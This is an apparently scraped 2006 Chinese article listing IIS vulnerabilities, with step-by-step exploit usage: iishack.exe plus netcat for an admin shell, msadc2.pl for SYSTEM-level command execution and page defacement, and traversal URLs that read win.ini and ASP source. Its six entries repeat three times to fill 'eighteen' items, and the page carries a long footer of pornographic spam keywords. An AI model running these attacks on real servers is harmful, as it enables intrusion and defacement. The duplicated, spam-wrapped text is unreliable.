国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

網管必知:IIS中常見的十八個安全漏洞
2006-04-11   

1. IIS4hack緩沖溢出

  主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat來連接你要檢測的服務器:

  c:>nc 80

  如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

  2.msadc

  IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

  察看文件源代碼

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  4.Showcode.asp

  察看文件源代碼

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  5.Null.htw

  察看文件源代碼

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  6.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

  http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

  format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

  這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

  一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

  7. iis4hack緩沖溢出

  主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat來連接你要檢測的服務器:

  c:>nc 80

  如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

  8.msadc

  IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

9.Codebrws.asp

  察看文件源代碼

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  10.Showcode.asp

  察看文件源代碼

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  11.Null.htw

  察看文件源代碼

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  12.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

  http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

  format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

  這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

  一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

  13. iis4hack緩沖溢出

  主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat來連接你要檢測的服務器:

  c:>nc 80

  如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

  14.msadc

  IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

15.Codebrws.asp

  察看文件源代碼

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  16.Showcode.asp

  察看文件源代碼

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  17.Null.htw

  察看文件源代碼

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  18.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

  http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

  format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

  這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

  一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL:http://www.victim.com/default.asp::$DATA你就得到了源代碼

熱詞搜索:

上一篇:VoIP協議 無法忽略的安全隱患之痛
下一篇:垃圾郵件管理辦法引發多重影響

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产成人午夜99999| 91婷婷韩国欧美一区二区| 美日韩一区二区| 午夜私人影院久久久久| 亚洲精品中文在线影院| 亚洲午夜电影在线| 一区二区三区不卡视频在线观看| 一区二区三区加勒比av| 国产在线国偷精品免费看| 日韩欧美国产午夜精品| 日韩精品免费视频人成| 欧美一区二区三区的| 国模大尺度一区二区三区| 久久久精品中文字幕麻豆发布| 成人午夜电影久久影院| 亚洲精品成人悠悠色影视| 日韩一区二区免费在线电影| 粉嫩在线一区二区三区视频| 亚洲一区二区成人在线观看| 26uuu亚洲综合色| 91福利在线播放| 寂寞少妇一区二区三区| 亚洲精品乱码久久久久久久久 | 国产一区二区三区在线看麻豆| 久久久久99精品一区| 欧美在线观看18| 国产精品正在播放| 亚洲综合区在线| 亚洲国产精品成人综合| 日韩欧美国产一区在线观看| 99v久久综合狠狠综合久久| 日本视频在线一区| 亚洲精品日产精品乱码不卡| 久久精品这里都是精品| 在线播放91灌醉迷j高跟美女| 国产91在线|亚洲| 久久国产精品99久久久久久老狼 | 国产香蕉久久精品综合网| 欧美日韩在线免费视频| 风间由美性色一区二区三区| 国产一区激情在线| 日韩中文字幕亚洲一区二区va在线| 国产欧美视频一区二区| 精品剧情在线观看| 在线播放91灌醉迷j高跟美女 | 日韩欧美123| 精品视频1区2区| 欧美性生活大片视频| 97久久超碰国产精品| 成人精品国产一区二区4080| 久久aⅴ国产欧美74aaa| 日韩电影免费在线观看网站| 亚洲第一电影网| 亚洲成人午夜电影| 首页国产丝袜综合| 五月天欧美精品| 视频一区中文字幕| 日韩国产成人精品| 日本美女一区二区三区视频| 日韩制服丝袜先锋影音| 蜜臀av性久久久久蜜臀aⅴ| 美女视频免费一区| 经典三级一区二区| 福利一区福利二区| 成人免费视频一区| 99精品欧美一区| 色噜噜久久综合| 欧美精品第1页| 日韩午夜av一区| 亚洲精品一区二区三区精华液| 精品国产精品网麻豆系列 | 韩国一区二区三区| eeuss鲁片一区二区三区在线观看| 国产精品99精品久久免费| 国产v综合v亚洲欧| 色综合中文字幕国产| 99久久久国产精品| 欧美日韩日日夜夜| 欧美va亚洲va| 亚洲国产精品ⅴa在线观看| 亚洲男人的天堂在线aⅴ视频| 亚洲一区二区精品久久av| 蜜桃视频一区二区三区| 国产99久久久国产精品潘金 | 久久蜜桃av一区二区天堂 | 亚洲一二三四在线| 青青草原综合久久大伊人精品| 狠狠色综合播放一区二区| 99久久精品国产麻豆演员表| 欧美日精品一区视频| 精品粉嫩aⅴ一区二区三区四区| 中文字幕国产精品一区二区| 亚洲午夜三级在线| 国产精品影视在线观看| 在线观看www91| 国产偷v国产偷v亚洲高清| 亚洲成人免费影院| 成人国产电影网| 欧美精品久久天天躁| 国产精品天美传媒| 天堂一区二区在线| 盗摄精品av一区二区三区| 91超碰这里只有精品国产| 国产精品免费视频一区| 蜜桃91丨九色丨蝌蚪91桃色| 日本高清视频一区二区| 国产欧美精品在线观看| 人人狠狠综合久久亚洲| 91在线一区二区| 国产日韩欧美综合一区| 日本怡春院一区二区| 色欧美片视频在线观看在线视频| 亚洲精品一区二区三区蜜桃下载| 亚洲一区二区精品久久av| 国产91精品一区二区麻豆网站| 日韩午夜av一区| 日韩av中文字幕一区二区三区| 精品国产成人系列| 性感美女极品91精品| 91丝袜高跟美女视频| 国产精品全国免费观看高清 | 六月丁香综合在线视频| 欧美久久久久久蜜桃| 亚洲一二三区在线观看| 91麻豆文化传媒在线观看| 国产精品久久久久久久久动漫| 精品亚洲欧美一区| 日韩欧美亚洲国产精品字幕久久久| 亚洲一级二级在线| 欧美日韩亚洲另类| 亚洲mv在线观看| 欧美性生活影院| 天天综合色天天综合| 777亚洲妇女| 日本最新不卡在线| 精品国产乱码久久久久久久久| 日韩电影在线免费观看| 欧美成人在线直播| 狠狠色丁香久久婷婷综| 国产三级久久久| 99这里只有久久精品视频| 亚洲视频一二三区| 欧美三级三级三级爽爽爽| 婷婷一区二区三区| 欧美电影免费观看高清完整版在线 | 亚洲欧洲精品一区二区精品久久久 | 国产剧情在线观看一区二区 | 久久久精品tv| 成人免费观看av| 亚洲精品老司机| 欧美久久高跟鞋激| 久久国产三级精品| 国产精品久久看| 欧美日韩中文精品| 久久精品国产免费| 国产精品欧美一区喷水| 在线免费av一区| 日本午夜一本久久久综合| 久久精品水蜜桃av综合天堂| 91影院在线观看| 天天综合网 天天综合色| 2023国产精品视频| 91国产福利在线| 激情小说欧美图片| 亚洲精品你懂的| 久久久精品影视| 欧美日韩aaa| 岛国精品一区二区| 日韩国产欧美在线视频| 国产精品久久久久久久裸模| 欧美人与禽zozo性伦| 成人妖精视频yjsp地址| 偷拍亚洲欧洲综合| 国产精品青草综合久久久久99| 欧美日韩精品高清| 大胆欧美人体老妇| 极品少妇xxxx偷拍精品少妇| 亚洲女厕所小便bbb| 久久精品在线免费观看| 91精品国产丝袜白色高跟鞋| 91在线观看下载| 国产精品中文字幕日韩精品 | 成人av手机在线观看| 天天免费综合色| 一区二区中文字幕在线| 久久亚洲春色中文字幕久久久| 日本道精品一区二区三区| 春色校园综合激情亚洲| 美洲天堂一区二卡三卡四卡视频| 亚洲色图一区二区三区| 国产亚洲美州欧州综合国| 欧美日韩日日夜夜| 91影院在线免费观看| 国产成人高清视频| 极品少妇xxxx精品少妇| 日本成人在线电影网| 亚洲成人资源在线| 亚洲黄色性网站| 亚洲人成网站影音先锋播放| 欧美激情在线免费观看|